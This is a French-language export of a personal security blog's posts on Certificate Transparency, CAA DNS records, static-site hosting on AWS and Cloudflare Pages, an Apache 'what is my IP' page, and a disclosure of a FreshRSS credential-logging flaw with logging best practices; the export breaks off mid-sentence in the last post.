[{"content":"","date":"2026-04-07","externalUrl":null,"permalink":"/fr/","section":"Ixonae on Security","summary":"","title":"Ixonae on Security","type":"page"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAujourd\u0026rsquo;hui, j\u0026rsquo;ai appris que chaque fois que vous émettez un certificat SSL pour un domaine, celui-ci est publiquement enregistré dans ce que l\u0026rsquo;on appelle les journaux de Certificate Transparency (CT).\nCe système a été créé par Google en 2013, à la suite de l\u0026rsquo;incident DigiNotar (et d\u0026rsquo;autres), où cette autorité de certification (CA) a été piratée et a fini par émettre un certain nombre de certificats frauduleux dans le but de permettre des attaques de type man-in-the-middle.\nL\u0026rsquo;idée de Certificate Transparency (CT) est de permettre la surveillance et l\u0026rsquo;audit des autorités de certification en publiant tous les certificats émis dans des journaux publics en ajout uniquement (append-only). Ainsi, tout problème lié à une CA compromise peut être détecté rapidement et corrigé.\nCes journaux peuvent être consultés sur des plateformes telles que crt.sh. (Je connaissais déjà des plateformes comme Censys qui répertorient les certificats et les domaines, et je pensais naïvement qu\u0026rsquo;elles se contentaient de parcourir le web pour les obtenir 😅)\nDes logiciels tels que Mozilla Firefox et Google Chrome refusent ensuite les certificats qui ne font pas partie des journaux CT, en utilisant le Signed Certificate Timestamp (SCT).\nTypiquement, les autorités de certification contactent un fournisseur de journaux, reçoivent un SCT de celui-ci, puis intègrent cette signature dans le certificat, permettant aux logiciels de vérifier la signature par rapport à une liste de journaux CT de confiance, sans avoir besoin d\u0026rsquo;interroger les journaux au moment de la navigation.\nPar exemple, pour mon nom de domaine, on peut interroger ces informations depuis le certificat comme suit.\n$ echo | openssl s_client -connect ixonae.com:443 2\u0026gt;/dev/null | openssl x509 -noout -text | grep -A 20 \u0026#34;SCT\u0026#34; CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 96:97:64:BF:55:58:97:AD:F7:43:87:68:37:08:42:77: E9:F0:3A:D5:F6:A4:F3:36:6E:46:A4:3F:0F:CA:A9:C6 Timestamp : Feb 10 20:26:14.687 2026 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DB:E7:79:00:09:79:4F:B3:D6:0B:BA: 0B:E9:3F:BF:AB:CF:DF:78:3E:D0:71:B0:F3:C7:48:26: 57:8B:8C:A1:91:02:21:00:DE:9B:CA:E5:25:48:DE:DA: 25:78:B9:98:96:47:A4:AD:FA:65:C5:9F:47:68:8E:BD: 1F:28:9C:85:BC:EF:FE:CC Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 49:9C:9B:69:DE:1D:7C:EC:FC:36:DE:CD:87:64:A6:B8: 5B:AF:0A:87:80:19:D1:55:52:FB:E9:EB:29:DD:F8:C3 Timestamp : Feb 10 20:26:14.652 2026 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:B9:D9:26:BC:F4:BA:6F:E5:20:5A:4A: Notez qu\u0026rsquo;il n\u0026rsquo;y a pas un seul journal, mais plusieurs. Généralement, seul un ensemble de journaux de confiance sera inclus dans les navigateurs via des programmes de journaux de confiance.\nRessources supplémentaires\nIntroducing Certificate Transparency and Nimbus (Cloudflare) Certificate Transparency - How it Works (transparency.dev) List of Monitors (transparency.dev) RFC 6962 - Certificate Transparency ","date":"2026-04-07","externalUrl":null,"permalink":"/fr/notes/2026/04/til-ct-certificate-transparency/","section":"Notes","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nAujourd’hui, j’ai appris que chaque fois que vous émettez un certificat SSL pour un domaine, celui-ci est publiquement enregistré dans ce que l’on appelle les journaux de Certificate Transparency (CT).\n","title":"TIL : Les certificats SSL sont publiés via les journaux de Certificate Transparency","type":"notes"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans l\u0026rsquo;article que j\u0026rsquo;avais écrit il y a quelque temps sur le passage à Hugo pour mon blog (Goodbye Ghost, Hello Hugo), je mentionnais comment j\u0026rsquo;utilisais AWS CloudFront pour l\u0026rsquo;hébergement.\nAWS avait l\u0026rsquo;avantage de fonctionner directement avec Hugo (c\u0026rsquo;est-à-dire qu\u0026rsquo;on pouvait utiliser la commande hugo deploy sans aucune autre dépendance), mais cela nécessitait de mettre en place un peu d\u0026rsquo;infrastructure.\nJ\u0026rsquo;avais aussi fini par le placer derrière Cloudflare pour éviter la faillite dans le cas improbable où le site recevrait beaucoup de requêtes (c\u0026rsquo;était très bon marché sinon ; quelques centimes par mois.)\nRécemment, je voulais simplifier mon infrastructure et je suis tombé sur Cloudflare Pages. J\u0026rsquo;ai décidé de l\u0026rsquo;essayer. Le processus s\u0026rsquo;est avéré étonnamment simple. En gros, il suffit de :\nCréer une clé API avec les permissions d\u0026rsquo;écriture sur Account / Cloudflare Pages Installer wrangler et créer le projet avec npx wrangler pages project create my-project (pour une raison quelconque, cela ne peut pas se faire via l\u0026rsquo;interface web) Lier votre domaine dans Custom Domains dans le Page Project Note : la clé API ne peut pas être limitée à un projet Pages spécifique, seulement au compte entier. Si cela vous préoccupe, envisagez d\u0026rsquo;utiliser un compte Cloudflare dédié.\nSi votre dépôt est sur GitHub, vous pouvez éviter le CI/CD entièrement en liant le dépôt directement dans le tableau de bord Cloudflare. J\u0026rsquo;utilise un dépôt git auto-hébergé, mais j\u0026rsquo;ai simplement eu à ajouter deux étapes à ma configuration CI/CD :\n- name: Build Hugo run: hugo - name: Deploy to Cloudflare Pages env: CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }} CLOUDFLARE_ACCOUNT_ID: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} run: npx wrangler pages deploy public --project-name=my-project À noter que public dans la commande de déploiement fait référence au répertoire de sortie par défaut de Hugo contenant votre site web.\nSi vous ne connaissez pas votre CLOUDFLARE_ACCOUNT_ID, accédez simplement à https://dash.cloudflare.com/ et vous serez redirigé vers https://dash.cloudflare.com/{votre account ID}/home/overview.\nLes performances sont également bonnes (du moins selon PageSpeed Insights), et je n\u0026rsquo;ai constaté aucune régression par rapport à CloudFront.\nRésultats PageSpeed Insights après la migration vers Cloudflare Pages Dans l\u0026rsquo;ensemble, je suis plutôt satisfait de cette configuration. J\u0026rsquo;ai une facture AWS en moins (Pages est gratuit) et une pièce d\u0026rsquo;infrastructure en moins à gérer, et mon blog reste facile à déployer et rapide. Le seul inconvénient que j\u0026rsquo;ai trouvé jusqu\u0026rsquo;à présent est que les analytics de Cloudflare Pages sont légèrement moins détaillées que celles de CloudFront, mais ce n\u0026rsquo;est pas rédhibitoire.\n","date":"2026-04-01","externalUrl":null,"permalink":"/fr/notes/2026/04/hosting-hugo-cloudflare-pages/","section":"Notes","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nDans l’article que j’avais écrit il y a quelque temps sur le passage à Hugo pour mon blog (Goodbye Ghost, Hello Hugo), je mentionnais comment j’utilisais AWS CloudFront pour l’hébergement.\n","title":"Héberger Hugo avec Cloudflare Pages plutôt qu'AWS CloudFront","type":"notes"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans le cadre de Network Watcher, je voulais avoir quelque chose comme https://ifconfig.me/ip que je puisse auto-héberger sans avoir à installer ou configurer quoi que ce soit de nouveau.\nComme j\u0026rsquo;ai un serveur Apache qui tourne en tant que serveur proxy quelque part, j\u0026rsquo;ai décidé d\u0026rsquo;explorer mes options.\nJ\u0026rsquo;ai découvert qu\u0026rsquo;on peut utiliser mod_include puisqu\u0026rsquo;il est déjà compilé dans httpd sur les systèmes RHEL (bien qu\u0026rsquo;il ne soit pas actif par défaut ; il nécessite une configuration explicite pour fonctionner.)\nLe script .shtml s\u0026rsquo;est donc résumé à une seule ligne :\n\u0026lt;!--#echo var=\u0026#34;REMOTE_ADDR\u0026#34; --\u0026gt; Cela ne fonctionnerait pas tout seul, il a donc fallu ajouter de la configuration dans le fichier vhost d\u0026rsquo;Apache :\nDocumentRoot /path/to/dir \u0026lt;Directory /path/to/dir\u0026gt; # S\u0026#39;assurer qu\u0026#39;on ne peut pas utiliser la fonction exec de SSI, # ni écraser la configuration actuelle Options IncludesNOEXEC AllowOverride None # Indique à Apache de servir les fichiers .shtml avec le type MIME text/html # pour que la page soit affichée et non téléchargée. AddType text/html .shtml # On indique à Apache d\u0026#39;utiliser le processeur SSI pour parser les fichiers shtml AddOutputFilter INCLUDES .shtml DirectoryIndex index.shtml Require all granted \u0026lt;/Directory\u0026gt; RewriteEngine On # Refuser les tokens invalides RewriteCond %{HTTP:Authorization} !^Bearer\\ dummy-password$ RewriteRule .* - [F] # Refuser tout ce qui n\u0026#39;est pas / RewriteCond %{REQUEST_URI} !^/$ RewriteCond %{REQUEST_URI} !^/index\\.shtml$ RewriteRule .* - [F] Vous remarquerez peut-être la ligne RewriteCond %{HTTP:Authorization} avec un mot de passe codé en dur. Je voulais avoir une autorisation Bearer simple sans rien faire de compliqué (et j\u0026rsquo;étais aussi curieux de savoir si c\u0026rsquo;était possible.) Le mot de passe codé en dur n\u0026rsquo;est pas très élégant (on pourrait le déplacer dans un fichier séparé via la directive Include d\u0026rsquo;Apache), mais il n\u0026rsquo;y a pratiquement aucun risque même si quelqu\u0026rsquo;un accède à la page, donc ça me convient.\nRessources supplémentaires\nServer Side Includes (Wikipedia) Apache Module mod_include (apache.org) ","date":"2026-03-31","externalUrl":null,"permalink":"/fr/notes/2026/03/mod_apache_what_is_ip/","section":"Notes","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nDans le cadre de Network Watcher, je voulais avoir quelque chose comme https://ifconfig.me/ip que je puisse auto-héberger sans avoir à installer ou configurer quoi que ce soit de nouveau.\n","title":"Utiliser Apache mod_include pour un simple script \"Quelle est mon IP\"","type":"notes"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nCette page regroupe certains de mes projets open-source.\nUtils - Outils # Une collection d\u0026rsquo;outils utilitaires axés sur la confidentialité.\nPour l\u0026rsquo;instant, elle contient quelques outils web permettant de :\nFiligraner des documents sensibles à l\u0026rsquo;aide de différentes méthodes Lire et modifier les données EXIF des images Ce sont de simples pages web en HTML + JS. Elles peuvent être ouvertes localement et ne nécessitent l\u0026rsquo;envoi d\u0026rsquo;aucune donnée, même en utilisant la version hébergée.\nLes outils sont accessibles sur web-tools.ixonae.com\nJe prévois d\u0026rsquo;élargir la collection en fonction de mes besoins futurs.\nCode source\nNetwork Watcher - Application macOS # Une application macOS dans la barre de menus qui surveille votre adresse IP externe en temps réel. Elle compare votre IP actuelle aux plages configurées pour chaque réseau et vous alerte en cas de différence.\nPrincipalement le résultat de mes expérimentations pour voir ce que l\u0026rsquo;on peut obtenir de Claude Code pour des applications macOS, mais je le trouve utile et je compte donc continuer à le maintenir.\nCode source\n","date":"2026-03-30","externalUrl":null,"permalink":"/fr/projects/","section":"Ixonae on Security","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nCette page regroupe certains de mes projets open-source.\n","title":"Projets","type":"page"},{"content":"","date":"2026-03-20","externalUrl":null,"permalink":"/fr/notes/","section":"Notes","summary":"","title":"Notes","type":"notes"},{"content":"","date":"2023-06-20","externalUrl":null,"permalink":"/fr/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLors de la migration de mon blog vers S3 et CloudFormation, j\u0026rsquo;avais besoin de générer un nouveau certificat en utilisant AWS Certificate Manager. Cependant, même après avoir créé les bons enregistrements DNS et attendu leur propagation, AWS n\u0026rsquo;acceptait pas ma demande de génération sans fournir de raison.\nAprès avoir passé beaucoup de temps à essayer de comprendre ce qui se passait, j\u0026rsquo;ai découvert que la validation échouait parce que je n\u0026rsquo;avais pas autorisé l\u0026rsquo;autorité de certification d\u0026rsquo;Amazon à émettre un certificat SSL pour mon nom de domaine, ce qui aurait dû être fait en ajoutant un enregistrement DNS CAA (Certification Authority Authorisation).\nÀ quoi sert le champ CAA ? # Les entrées DNS CAA permettent de spécifier quelles autorités de certification sont autorisées à générer des certificats pour un domaine donné. Cela vise à aider à prévenir les émissions erronées de certificats.\nConfiguration CAA # Regardons un exemple basique. Ce qui suit est un extrait de la sortie de la commande dig CAA ixonae.com\nixonae.com. 16 IN CAA 0 issuewild \u0026#34;letsencrypt.org\u0026#34; ixonae.com. 16 IN CAA 0 iodef \u0026#34;mailto:[redacted to prevent crawling]@ixonae.com\u0026#34; ixonae.com. 16 IN CAA 0 issue \u0026#34;amazon.com\u0026#34; ixonae.com. 16 IN CAA 0 issue \u0026#34;letsencrypt.org\u0026#34; La réponse indique qu\u0026rsquo;Amazon et Let\u0026rsquo;s Encrypt peuvent tous deux générer des certificats pour le domaine ixonae.com et ses sous-domaines, mais seul Let\u0026rsquo;s Encrypt peut générer des certificats wildcard. Dans le cas où une autorité de certification reçoit une demande invalide de génération de certificat, elle doit envoyer un message à l\u0026rsquo;adresse e-mail spécifiée. La valeur 0 est un drapeau (issue, issuewild et iodef sont des tags) indiquant aux CAs qu\u0026rsquo;elles ne doivent pas s\u0026rsquo;inquiéter si elles ne comprennent pas une entrée CAA, et simplement essayer de lire la suivante.\nDrapeaux # Il existe deux valeurs de drapeaux possibles :\n0 (non critique) est la valeur par défaut. Si une CA ne comprend pas une entrée, elle peut simplement l\u0026rsquo;ignorer 1 (critique) indique à la CA qu\u0026rsquo;elle ne peut pas procéder à l\u0026rsquo;émission du certificat si elle ne comprend pas la propriété, et qu\u0026rsquo;elle doit notifier le propriétaire de l\u0026rsquo;échec (en utilisant les valeurs iodef fournies) Portée du CAA # Dans notre exemple, toutes les entrées ont été définies pour ixonae.com, mais nous pouvons aussi définir des entrées pour des domaines spécifiques comme www.ixonae.com ou test.www.ixonae.com.\nLa priorité des règles va de la plus spécifique à la moins spécifique. C\u0026rsquo;est-à-dire que si nous voulons générer un certificat pour test.subdomain.domain.com, les CAs vérifieront d\u0026rsquo;abord s\u0026rsquo;il existe des règles pour test.subdomain.domain.com. Sinon, elles vérifieront s\u0026rsquo;il y en a pour subdomain.domain.com, puis finalement pour domain.com.\nAutre point à noter : si vous n\u0026rsquo;avez que des entrées issue, alors les CAs listées sont également autorisées à émettre des certificats wildcard. Cependant, si vous avez des entrées issuewild, alors seules les entrées avec ce drapeau peuvent générer des certificats wildcard.\nUne dernière propriété intéressante est que si vous créez uniquement une entrée avec la CA étant \u0026quot;;\u0026quot;, alors personne n\u0026rsquo;est autorisé à générer un certificat pour le domaine spécifié (s\u0026rsquo;il n\u0026rsquo;y a aucune entrée CAA, alors tout le monde l\u0026rsquo;est).\nRéférences # https://letsencrypt.org/docs/caa/ https://community.letsencrypt.org/t/caa-issuewild-question/159018/4 https://www.thesslstore.com/blog/what-is-caa-record-certificate-authority-authorization/ Crédits # Photo de couverture par Scott Rodgerson sur Unsplash ","date":"2023-06-20","externalUrl":null,"permalink":"/fr/posts/2023/dns-certification-authority-authorization/","section":"Articles","summary":"Aujourd’hui, nous apprenons ce qu’est l’entrée DNS CAA et comment elle aide à prévenir les émissions erronées de certificats SSL","title":"TIL : L'existence du champ DNS d'autorisation d'autorité de certification","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDepuis sa création, ce blog fonctionnait avec Ghost sur un serveur dédié. Comme j\u0026rsquo;en étais de moins en moins satisfait, j\u0026rsquo;ai décidé qu\u0026rsquo;il était temps de changer, et de donner sa chance à Hugo, un générateur de sites statiques open source.\nDans cet article, j\u0026rsquo;expliquerai pourquoi j\u0026rsquo;ai effectué cette migration, et comment j\u0026rsquo;ai configuré S3 et CloudFront sur AWS (en utilisant Terraform) pour héberger mon blog.\nPourquoi cette migration ? # Il y avait pas mal de choses qui me dérangeaient avec Ghost. Parmi elles :\nLe manque de thèmes et modules maintenus (par exemple : les modules d\u0026rsquo;hébergement d\u0026rsquo;images AWS n\u0026rsquo;ont eu aucun commit depuis des années ; au bout d\u0026rsquo;un certain temps, j\u0026rsquo;ai dû arrêter d\u0026rsquo;utiliser le thème que j\u0026rsquo;avais payé et installé quand j\u0026rsquo;ai commencé à utiliser Ghost parce qu\u0026rsquo;il n\u0026rsquo;était plus mis à jour, causant des problèmes partout, \u0026hellip;) À un moment, j\u0026rsquo;ai commencé à utiliser Casper, le thème officiel, avec quelques modifications, mais cela signifiait que je devais appliquer ces modifications à chaque fois que je mettais à jour le thème Pas de bon système de gestion des médias, et l\u0026rsquo;éditeur n\u0026rsquo;est pas si agréable à utiliser (surtout quand on écrit du markdown simple, comme des listes imbriquées) Le rendu des pages était lent Du point de vue de l\u0026rsquo;administration système, Ghost se plaint si son répertoire d\u0026rsquo;installation n\u0026rsquo;a pas ses droits configurés au moins à chmod 755, même s\u0026rsquo;il tourne sous son propre utilisateur, et le dernier 5 n\u0026rsquo;est pas utile (aussi, j\u0026rsquo;ai un profond dégoût pour les technologies JS-ish) Le coup de grâce a été d\u0026rsquo;essayer de migrer mon blog vers un nouveau serveur. L\u0026rsquo;export ne contient pas tout, et ensuite, Ghost ne fonctionnait pas correctement après la mise à jour de Node.js (que j\u0026rsquo;aurais pu corriger, mais à ce stade, toutes ces petites choses m\u0026rsquo;ont donné envie d\u0026rsquo;essayer autre chose). Ne vous méprenez pas, je pense toujours que Ghost est une assez bonne plateforme, mais je ne crois pas que ce soit actuellement le meilleur outil pour ce que je veux faire.\nÀ partir de là, j\u0026rsquo;ai considéré WordPress : facile à installer et maintenir, beaucoup de modules et thèmes disponibles, \u0026hellip; Mais je vois des CVE liées à WordPress dans mon flux RSS un jour sur deux. Aussi, cette plateforme n\u0026rsquo;est pas connue pour sa rapidité.\nDans le passé, j\u0026rsquo;avais entendu parler de Hugo, un générateur de sites statiques open source, et sachant que je ne tirais de toute façon pas vraiment parti des fonctionnalités non-statiques de Ghost, j\u0026rsquo;ai décidé de l\u0026rsquo;essayer. Par rapport à Ghost :\nC\u0026rsquo;est plus rapide (évidemment, puisque le site est statique) C\u0026rsquo;est plus facile à héberger (d\u0026rsquo;abord parce que c\u0026rsquo;est juste un site statique, et ensuite parce que Hugo peut déployer le site automatiquement vers une variété de services comme AWS, Azure ou Cloudflare), et c\u0026rsquo;est moins cher Cela ne nécessite virtuellement aucune maintenance (pas besoin de s\u0026rsquo;inquiéter de mettre à jour un serveur régulièrement, plus facile à sauvegarder, \u0026hellip;) Le site et le thème sont plus faciles à personnaliser (bien qu\u0026rsquo;il n\u0026rsquo;y ait pas beaucoup plus de choix que pour Ghost en ce qui concerne les thèmes) Bien sûr, je perds un peu de commodité du fait que le site devienne statique (par exemple si je décide de donner aux lecteurs la possibilité d\u0026rsquo;ajouter des commentaires, je devrai utiliser Disqus ou quelque chose du genre) Configuration AWS # Comme je l\u0026rsquo;ai mentionné précédemment, mon blog Hugo est hébergé sur AWS, en utilisant S3 et CloudFront. Tout est configuré avec Terraform, et poussé grâce aux capacités de déploiement intégrées de Hugo. Passons en revue les étapes que j\u0026rsquo;ai suivies pour mettre mon blog en ligne.\nAWS Certificate Manager # La première étape était de créer un certificat pour ixonae.com et www.ixonae.com en utilisant ACM. J\u0026rsquo;ai utilisé la méthode de validation DNS basique et RSA 2048. Ensuite, j\u0026rsquo;ai ajouté les entrées CNAME appropriées à mes paramètres DNS pour prouver que j\u0026rsquo;en étais propriétaire. Il aurait été possible de le faire depuis Terraform également, mais comme mon fournisseur DNS n\u0026rsquo;est pas AWS, j\u0026rsquo;ai trouvé plus facile de générer le certificat à la main (à cause de l\u0026rsquo;étape de validation).\nNotez que pour être utilisable avec CloudFormation, le certificat doit être créé dans la zone us-east-1.\nConfiguration S3 et CloudFront via Terraform # La configuration fait plus de 100 lignes, donc je ne la collerai pas ici, mais vous pouvez la voir sur GitHub. Ce qu\u0026rsquo;elle fait est le suivant :\nCrée un bucket nommé example-website qui Conserve l\u0026rsquo;historique des modifications de fichiers pendant 30 jours, ensuite il ne gardera que la modification la plus récente A son accès défini comme non-public, et son contenu ne peut être demandé qu\u0026rsquo;à travers CloudFront Utilise une clé de chiffrement de bucket (\u0026ldquo;la clé de bucket réduit les coûts de chiffrement en diminuant les appels à AWS KMS\u0026rdquo;) Crée une distribution CloudFront qui Utilise le bucket S3 précédemment créé comme source de données Autorise l\u0026rsquo;IP v6 Définit la politique de cache comme Managed-CachingOptimized (recommandé par AWS) Utilise TLSv1.2_2021 Supporte HTTP/2 (HTTP/1 est par défaut, et HTTP/3 peut être ajouté) Configure le certificat SSL grâce à son ARN ID codé en dur, et ajoute des noms de domaine alternatifs Compresse les objets automatiquement Redirige HTTP vers HTTPS Autorise les méthodes HTTP GET et HEAD Configure une fonction CloudFront à appliquer aux requêtes des visiteurs (par défaut les clients accèderont à des URLs telles que ixonae.com/blog/ mais nous voulons que CloudFront accède à ixonae.com/blog/index.html. Cela ne sera pas montré au client qui n\u0026rsquo;utilisera que l\u0026rsquo;URL \u0026ldquo;propre\u0026rdquo;) Crée un bucket S3 example-website-logs, et configure CloudFront pour écrire les logs dans le répertoire logs de ce bucket Crée et applique une politique S3 pour permettre à la distribution CloudFront d\u0026rsquo;accéder au bucket S3 example-website Notez que si vous voulez réutiliser ma configuration, vous devrez changer ce qui suit :\nLe nom du bucket doit être unique, et il est très probable que quelqu\u0026rsquo;un utilise déjà example-website Vous devez choisir une région (actuellement définie comme xx-xxxx-xx) Vous devez définir acm_certificate_arn avec l\u0026rsquo;ARN du certificat ACM créé à l\u0026rsquo;étape précédente, et remplacer aliases par les valeurs appropriées Après avoir appliqué ce Terraform, il ne reste plus qu\u0026rsquo;à configurer vos enregistrements DNS avec une entrée CNAME pointant vers le nom de domaine de la distribution généré par CloudFront (par exemple abcd.cloudfront.net).\nConfiguration Hugo # La configuration de Hugo est assez triviale. Il suffit que votre fichier de configuration contienne ce qui suit (bien qu\u0026rsquo;il y ait beaucoup plus d\u0026rsquo;options d\u0026rsquo;optimisation disponibles)\n[deployment.targets] name = \u0026#34;mydeployment\u0026#34; url = \u0026#34;s3://example-website?region=xx-xxxx-x\u0026#34; cloudFrontDistributionID = \u0026#34;xxxxxxxx\u0026#34; Et le déploiement peut être fait avec les commandes suivantes (à condition que vous ayez déjà un fichier ~/.aws/credentials avec les bons identifiants)\nhugo # Pour compiler le site hugo deploy # Pour tout uploader et invalider le cache CloudFront Conclusion et travaux futurs # Mon blog est maintenant en ligne avec Hugo et AWS, et je n\u0026rsquo;ai plus besoin de me soucier de la maintenance serveur ni de m\u0026rsquo;inquiéter de pouvoir remettre rapidement mon site en ligne en cas de panne. Aussi, j\u0026rsquo;ai maintenant un score de 100/100 en testant mon site avec PageSpeed Insights.\nPageSpeed Insights Score Ensuite, il y a quelques améliorations de workflow que je prévois de faire :\nQuand quelque chose est poussé sur la branche master de mon dépôt git, déclencher un déploiement vers la stack AWS de production Ajouter une tâche cron à mon pipeline CI/CD pour que Hugo essaie régulièrement de compiler et déployer le site (afin que les articles avec une date dans le futur soient automatiquement poussés au moment opportun) Quand la même chose est faite sur la branche dev, déclencher un déploiement vers un environnement de test nécessitant une authentification Petites améliorations de la configuration AWS (meilleure surveillance et stockage des logs, réplication inter-régions, \u0026hellip;) Crédits # Photo de couverture par Glenn Carstens-Peters sur Unsplash ","date":"2023-03-26","externalUrl":null,"permalink":"/fr/posts/2023/goodbye-ghost-hello-hugo/","section":"Articles","summary":"Cet article décrit pourquoi mon blog utilise désormais Hugo au lieu de Ghost, et comment j’ai configuré AWS (S3 + CloudFront) avec Terraform pour le faire fonctionner","title":"Au revoir Ghost, bonjour Hugo","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nDans ce blog, je traiterai principalement des sujets suivants, à propos desquels j\u0026rsquo;essaierai de publier régulièrement mes recherches, réflexions et découvertes.\nVie privée OSINT Recherche sur le darknet (principalement les marchés noirs et autres activités illicites) Cybersécurité Administration système Cryptomonnaies (principalement le blanchiment et les fonctionnalités d\u0026rsquo;anonymat) Programmation Avertissement # Bien que ce blog traite de divers marchés noirs ou de lieux/services menant des opérations illégales, les articles sont destinés aux chercheurs et aux personnes curieuses d\u0026rsquo;en apprendre davantage sur ces sujets. Je ne vous encourage pas à utiliser l\u0026rsquo;un de ces services, et je n\u0026rsquo;en cautionne aucun. Vous devez respecter les lois des pays dans lesquels vous vivez. Veuillez ne pas m\u0026rsquo;envoyer d\u0026rsquo;e-mails pour demander des recommandations de marchés du darknet ou autres.\nContact # Je suis joignable via Twitter (@ixonae), Mastodon (@ixonae@infosec.exchange), ou par e-mail : contact at ixonae[.]com\nVous pouvez trouver ma clé PGP ici (Empreinte B2A6 CF48 EA83 1A4A 2F42 80EA BB9E 36B7 F950 C3B3)\n","date":"2023-03-19","externalUrl":null,"permalink":"/fr/about/","section":"Ixonae on Security","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nDans ce blog, je traiterai principalement des sujets suivants, à propos desquels j’essaierai de publier régulièrement mes recherches, réflexions et découvertes.\n","title":"À propos","type":"page"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nComme j\u0026rsquo;ai récemment déposé mon premier CVE (CVE-2023-22481 - Divulgation d\u0026rsquo;informations sensibles dans les fichiers de log de FreshRSS), je voulais profiter de l\u0026rsquo;occasion pour écrire quelques mots sur ce que j\u0026rsquo;ai trouvé, quels problèmes la journalisation excessive a pu causer dans ce cas, et quelles sont certaines des bonnes pratiques de journalisation.\nCe que j\u0026rsquo;ai trouvé # J\u0026rsquo;ai récemment commencé à utiliser FreshRSS (excellent logiciel, je le recommande vivement) et j\u0026rsquo;ai décidé d\u0026rsquo;installer une application mobile pour pouvoir tout lire depuis mon téléphone. Après avoir installé l\u0026rsquo;application, j\u0026rsquo;ai essayé de me connecter avec mon nom d\u0026rsquo;utilisateur et mon mot de passe, mais l\u0026rsquo;accès a été refusé. Il se trouvait que j\u0026rsquo;avais une console SSH ouverte sur mon serveur, alors j\u0026rsquo;ai suivi les logs et j\u0026rsquo;ai découvert ce qui suit :\n[_POST] =\u0026gt; Array ( [Email] =\u0026gt; MyUserName [Passwd] =\u0026gt; MyPassword ) [_COOKIE] =\u0026gt; Array ( ) [INPUT] =\u0026gt; Email=MyUserName\u0026amp;Passwd=MyPassword \u0026ldquo;Attendez,\u0026rdquo; ai-je pensé. \u0026ldquo;On dirait bien mon mot de passe là-dedans.\u0026rdquo; J\u0026rsquo;ai ensuite téléchargé le code source et regardé ce qui se passait lors de l\u0026rsquo;utilisation de l\u0026rsquo;API. Le snippet suivant est ce que j\u0026rsquo;ai trouvé :\nif user exists: if user configuration is missing: log the error and dump the request\u0026#39;s headers, get, post, and cookie values if password is correct: accept login else if password is incorrect: log the error and dump the request\u0026#39;s headers, get, post, and cookie values else if user does not exist: log the error and dump the request\u0026#39;s headers, get, post, and cookie values En gros, si l\u0026rsquo;authentification échouait, toutes les données de la requête HTTP de connexion étaient journalisées dans le fichier de log du logiciel et dans syslog.\nNotez que le pseudo-code dit mot de passe, mais ce qui était attendu était une clé API (le mot de passe utilisateur ne peut être utilisé qu\u0026rsquo;avec l\u0026rsquo;interface web).\nQuel pourrait être l\u0026rsquo;impact ? # Si le logiciel fonctionnait en production avec plusieurs utilisateurs, les situations suivantes auraient pu se produire :\nUn utilisateur entre un mauvais nom d\u0026rsquo;utilisateur et une mauvaise clé API Un utilisateur entre accidentellement un nom d\u0026rsquo;utilisateur et un mot de passe qu\u0026rsquo;il utilise pour un autre service Un utilisateur entre son nom d\u0026rsquo;utilisateur et le mot de passe de son compte (au lieu de la clé API attendue) Un utilisateur entre un nom d\u0026rsquo;utilisateur et une clé API valides, mais pour une raison quelconque, son fichier de configuration ne peut pas être lu lorsqu\u0026rsquo;il essaie de se connecter Si un utilisateur malveillant exploitait ensuite un bug permettant de lire le fichier de log (notez que syslog est accessible à tous les utilisateurs par défaut), il pourrait faire ce qui suit :\nUtiliser le mot de passe pour se connecter au logiciel en tant que l\u0026rsquo;utilisateur (les données privées de l\u0026rsquo;utilisateur sont compromises ; cela donne plus de surface d\u0026rsquo;attaque) Utiliser le login et le mot de passe pour faire du credential stuffing et potentiellement accéder à d\u0026rsquo;autres comptes appartenant à l\u0026rsquo;utilisateur Bonnes pratiques de journalisation (en bref) # La journalisation est quelque chose que vous voulez avoir dans vos systèmes. Non seulement elle peut vous aider à résoudre les problèmes rencontrés par les systèmes/utilisateurs, mais elle peut aussi aider à investiguer les incidents de sécurité.\nCependant, trop de journalisation peut aussi être un problème. Des logs trop détaillés peuvent introduire divers risques, tant en matière de sécurité (comme nous l\u0026rsquo;avons vu dans l\u0026rsquo;exemple précédent) que juridiques.\nEn règle générale, vous ne devriez jamais journaliser des données telles que les mots de passe, les clés API, les données personnelles 